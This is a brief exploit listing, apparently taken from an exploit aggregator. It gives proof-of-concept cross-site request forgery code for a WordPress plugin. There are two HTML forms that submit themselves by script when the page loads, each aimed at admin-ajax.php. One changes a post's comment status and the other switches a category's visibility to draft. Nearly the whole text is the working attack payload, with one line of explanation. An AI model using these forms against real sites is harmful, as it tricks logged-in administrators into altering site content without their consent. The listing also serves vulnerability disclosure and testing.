Share
## https://sploitus.com/exploit?id=WPEX-ID:4A36E876-7E3B-4A81-9F16-9FF5FBB20DD6
The following PoC codes are for post ID 1 (rndval is really just a random value):
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="ame_ajax_set_commentstatus">
<input type="text" name="postid" value="1">
<input type="text" name="comment_status" value="1">
<input type="text" name="posttype" value="post">
<input type="text" name="rndval" value="123">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="ame_toggle_visibility">
<input type="text" name="category_id" value="1">
<input type="text" name="vis_status" value="draft">
<input type="text" name="posttype" value="post">
<input type="text" name="rndval" value="123">
</form>
<script>
document.getElementById("test").submit();
</script>